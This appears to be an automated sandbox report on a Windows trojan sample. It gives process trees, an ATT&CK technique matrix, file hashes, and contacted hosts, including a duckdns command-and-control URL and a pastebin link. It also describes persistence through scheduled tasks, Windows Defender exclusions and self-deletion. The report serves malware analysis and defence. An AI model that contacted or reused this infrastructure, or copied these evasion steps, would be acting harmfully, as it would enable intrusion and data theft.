Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeCode function: 0_2_00007FF6099D2710 GetModuleHandleW,GetProcAddress,GetSystemTimeAsFileTime,0_2_00007FF6099D2710
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation
1
Scheduled Task/Job
112
Process Injection
1
Disable or Modify Tools
OS Credential Dumping1
System Time Discovery
Remote Services11
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts1
Scheduled Task/Job
1
DLL Side-Loading
1
Scheduled Task/Job
131
Virtualization/Sandbox Evasion
LSASS Memory211
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution
Logon Script (Windows)1
DLL Side-Loading
112
Process Injection
Security Account Manager2
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS131
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion
DCSync14
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589501 Sample: sE5IdDeTp2.exe Startdate: 12/01/2025 Architecture: WINDOWS Score: 96 81 blockchainlegion.duckdns.org 2->81 83 polygon-rpc.com 2->83 89 Multi AV Scanner detection for submitted file 2->89 91 AI detected suspicious sample 2->91 93 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->93 10 dialer_java.exe 1 2->10         started        13 sE5IdDeTp2.exe 1 5 2->13         started        16 dialer_java.exe 2->16         started        18 5 other processes 2->18 signatures3 95 Uses dynamic DNS services 81->95 process4 file5 101 Modifies the context of a thread in another process (thread injection) 10->101 103 Adds a directory exclusion to Windows Defender 10->103 20 conhost.exe 36 10->20         started        24 powershell.exe 22 10->24         started        34 2 other processes 10->34 79 C:\ProgramData\...\dialer_java.exe, PE32+ 13->79 dropped 105 Self deletion via cmd or bat file 13->105 107 Uses schtasks.exe or at.exe to add and modify task schedules 13->107 26 powershell.exe 23 13->26         started        36 5 other processes 13->36 109 Multi AV Scanner detection for dropped file 16->109 111 Exploit detected, runtime environment starts unknown processes 16->111 28 powershell.exe 18->28         started        30 powershell.exe 18->30         started        32 powershell.exe 18->32         started        38 12 other processes 18->38 signatures6 process7 dnsIp8 85 blockchainlegion.duckdns.org 193.233.113.77, 49732, 80 FREE-MPEIRU Russian Federation 20->85 87 polygon-rpc.com 173.244.207.29, 443, 49731 UK2NET-ASGB United States 20->87 97 Adds a directory exclusion to Windows Defender 20->97 51 19 other processes 20->51 40 conhost.exe 24->40         started        99 Loading BitLocker PowerShell Module 26->99 42 conhost.exe 26->42         started        45 conhost.exe 28->45         started        47 conhost.exe 30->47         started        49 conhost.exe 32->49         started        53 3 other processes 34->53 55 7 other processes 36->55 57 18 other processes 38->57 signatures9 process10 signatures11 113 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 42->113 115 Adds a directory exclusion to Windows Defender 42->115 117 Loading BitLocker PowerShell Module 51->117 59 conhost.exe 51->59         started        61 conhost.exe 51->61         started        63 conhost.exe 51->63         started        75 16 other processes 51->75 65 Conhost.exe 53->65         started        67 Conhost.exe 53->67         started        69 Conhost.exe 53->69         started        71 Conhost.exe 57->71         started        73 Conhost.exe 57->73         started        process12 process13 77 Conhost.exe 59->77         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
sE5IdDeTp2.exe37%ReversingLabsWin64.Trojan.MintZard
SourceDetectionScannerLabelLink
C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe37%ReversingLabsWin64.Trojan.MintZard
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://blockchainlegion.duckdns.org/K0%Avira URL Cloudsafe
http://blockchainlegion.duckg0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/)0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/api/point.phpl0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/o0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/api/point.phpzvd0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/api/point.phpC0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/j0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/pvd0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/api/point.phhttps://pastebin.com/raw/0UNPcCFkpolygon-rpc.com0x750%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/api/point.phpvvd0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org:80/api/point.php0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/api/point.php0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org:80/api/point.phpP#0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/%0%Avira URL Cloudsafe
http://blockchainlegion.duckdns.org/#0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
blockchainlegion.duckdns.org
193.233.113.77
truetrue
    unknown
    polygon-rpc.com
    173.244.207.29
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://polygon-rpc.com/false
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://blockchainlegion.duckgconhost.exe, 00000019.00000002.3065697206.0000016478655000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://blockchainlegion.duckdns.org/jconhost.exe, 00000019.00000002.3065697206.0000016478593000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://blockchainlegion.duckdns.org/)conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://blockchainlegion.duckdns.org/Kconhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://blockchainlegion.duckdns.org/api/point.phpCconhost.exe, 00000019.00000002.3065200958.00000164767AA000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://blockchainlegion.duckdns.org/oconhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://pastebin.com/raw/0UNPcCFkdialer_java.exe, 00000011.00000003.1952018182.000001BE299B0000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3064692476.0000000140095000.00000002.00000001.00020000.00000000.sdmpfalse
          high
          http://blockchainlegion.duckdns.org/api/point.phplconhost.exe, 00000019.00000002.3066367565.000001647866C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://polygon-rpc.com:443/conhost.exe, 00000019.00000003.1962703704.000001647672F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065200958.000001647672F000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://pastebin.com/raw/0UNPcCFtconhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://polygon-rpc.com/ttingsconhost.exe, 00000019.00000002.3065200958.00000164766F8000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://blockchainlegion.duckdns.org/conhost.exe, 00000019.00000002.3065697206.0000016478564000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://blockchainlegion.duckdns.org/pvdconhost.exe, 00000019.00000002.3065200958.00000164766F8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://blockchainlegion.duckdns.org/api/point.phpzvdconhost.exe, 00000019.00000002.3065200958.00000164767AA000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://blockchainlegion.duckdns.org/api/point.phhttps://pastebin.com/raw/0UNPcCFkpolygon-rpc.com0x75dialer_java.exe, 00000011.00000003.1952018182.000001BE299B0000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3064692476.0000000140095000.00000002.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://blockchainlegion.duckdns.org:80/api/point.phpP#conhost.exe, 00000019.00000002.3065200958.0000016476762000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://blockchainlegion.duckdns.org/api/point.phpvvdconhost.exe, 00000019.00000002.3065200958.000001647672F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://blockchainlegion.duckdns.org/api/point.phpconhost.exe, 00000019.00000002.3065697206.0000016478655000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065200958.00000164767AA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065200958.000001647672F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://blockchainlegion.duckdns.org/#conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://blockchainlegion.duckdns.org:80/api/point.phpconhost.exe, 00000019.00000002.3065200958.0000016476762000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://blockchainlegion.duckdns.org/%conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                193.233.113.77
                blockchainlegion.duckdns.orgRussian Federation
                20549FREE-MPEIRUtrue
                173.244.207.29
                polygon-rpc.comUnited States
                13213UK2NET-ASGBfalse
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1589501
                Start date and time:2025-01-12 17:37:08 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 10m 9s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:137
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:sE5IdDeTp2.exe
                renamed because original name is a hash value
                Original Sample Name:dd36f6f79e68d5e54c75527db2da97ad.exe
                Detection:MAL
                Classification:mal96.troj.expl.evad.winEXE@250/60@2/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 57%
                • Number of executed functions: 8
                • Number of non-executed functions: 285
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtCreateKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                11:38:19API Interceptor262x Sleep call for process: powershell.exe modified
                11:38:27API Interceptor38x Sleep call for process: conhost.exe modified
                16:38:23Task SchedulerRun new task: Oracle Corporation path: %ProgramData%\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                173.244.207.29https://web3resolution.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                  http://debugticket.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                    https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                      https://metagalaxy.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                        http://bridge-a3vigrfjd-pancakeswap.vercel.app/Get hashmaliciousUnknownBrowse
                          https://bafybeih5zpu7rzaoeodorqhminsbsmv3eswg6px7qixdtiwflfle6cv364.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                            http://ecometanexus.unids.com/Get hashmaliciousUnknownBrowse
                              https://simplescalingdefender.pages.dev/Get hashmaliciousUnknownBrowse
                                http://rewardsforyoutoclaim.pages.dev/Get hashmaliciousUnknownBrowse
                                  http://rewards-tokss-foryou.pages.dev/Get hashmaliciousUnknownBrowse
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    FREE-MPEIRUhttps://sora-ai-download.com/Get hashmaliciousUnknownBrowse
                                    • 193.233.112.39
                                    Set-up.exeGet hashmaliciousUnknownBrowse
                                    • 193.233.84.212
                                    XODc5nV1kC.exeGet hashmaliciousLummaCBrowse
                                    • 193.233.112.194
                                    BnxBRWQWhy.exeGet hashmaliciousStealc, VidarBrowse
                                    • 193.233.112.44
                                    NJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                    • 193.233.112.44
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 193.233.113.184
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 193.233.113.184
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 193.233.113.184
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 193.233.113.184
                                    SecuriteInfo.com.Trojan.Crypt.23519.13317.exeGet hashmaliciousUnknownBrowse
                                    • 193.233.121.52
                                    UK2NET-ASGBLbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                    • 45.80.158.30
                                    BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                    • 45.80.158.30
                                    173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                    • 45.80.158.30
                                    Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                    • 45.80.158.30
                                    main_m68k.elfGet hashmaliciousMiraiBrowse
                                    • 77.92.90.50
                                    la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                    • 88.202.185.180
                                    la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                    • 46.28.54.10
                                    173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 45.80.158.30
                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 45.80.158.30
                                    loligang.x86.elfGet hashmaliciousMiraiBrowse
                                    • 80.209.188.4
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    a0e9f5d64349fb13191bc781f81f42e1TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                    • 173.244.207.29
                                    H5JVfa61AV.exeGet hashmaliciousLummaCBrowse
                                    • 173.244.207.29
                                    2EG0jAmtY6.exeGet hashmaliciousLummaCBrowse
                                    • 173.244.207.29
                                    5vrRrFN56j.exeGet hashmaliciousBdaejecBrowse
                                    • 173.244.207.29
                                    rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                    • 173.244.207.29
                                    installer_1.05_37.4.exeGet hashmaliciousLummaCBrowse
                                    • 173.244.207.29
                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                    • 173.244.207.29
                                    176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                    • 173.244.207.29
                                    Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                    • 173.244.207.29
                                    x.exeGet hashmaliciousLummaCBrowse
                                    • 173.244.207.29
                                    No context
                                    Process:C:\Users\user\Desktop\sE5IdDeTp2.exe
                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Category:modified
                                    Size (bytes):1245320
                                    Entropy (8bit):6.811982830856188
                                    Encrypted:false
                                    SSDEEP:12288:2iQnVXYD4TNwzBcgXn0dE/xmiNrP64F78O9PpctLMbl0UVh4OsYX0bLDHOM5p:KNw1iS/EiNb64F78yPd+WDsYX0bLzOCp
                                    MD5:DD36F6F79E68D5E54C75527DB2DA97AD
                                    SHA1:A373E613510ADA66CEA74FFC590C25EDC59957AC
                                    SHA-256:3030BA393865E41FEE490205BF5873B4041275A8830D5E764693771FEC2BD35E
                                    SHA-512:E1F9E1C8D246FD381D5AF12C87940DF54DF9F6877BFF58ABDEA7A8D533A31A675B553D7E5BB134BB64576DE53A3C72C4E8A3E624A639C13DFA918F2A4A638FD1
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 37%
                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...X.g.........."......~...V......@..........@.............................P............`.....................................................<....0..@.......L........(...@.................................(.......8............................................text....}.......~.................. ..`.rdata..0...........................@..@.data.......0......................@....pdata..L...........................@..@.00cfg..............................@..@.tls......... ......................@....rsrc...@....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
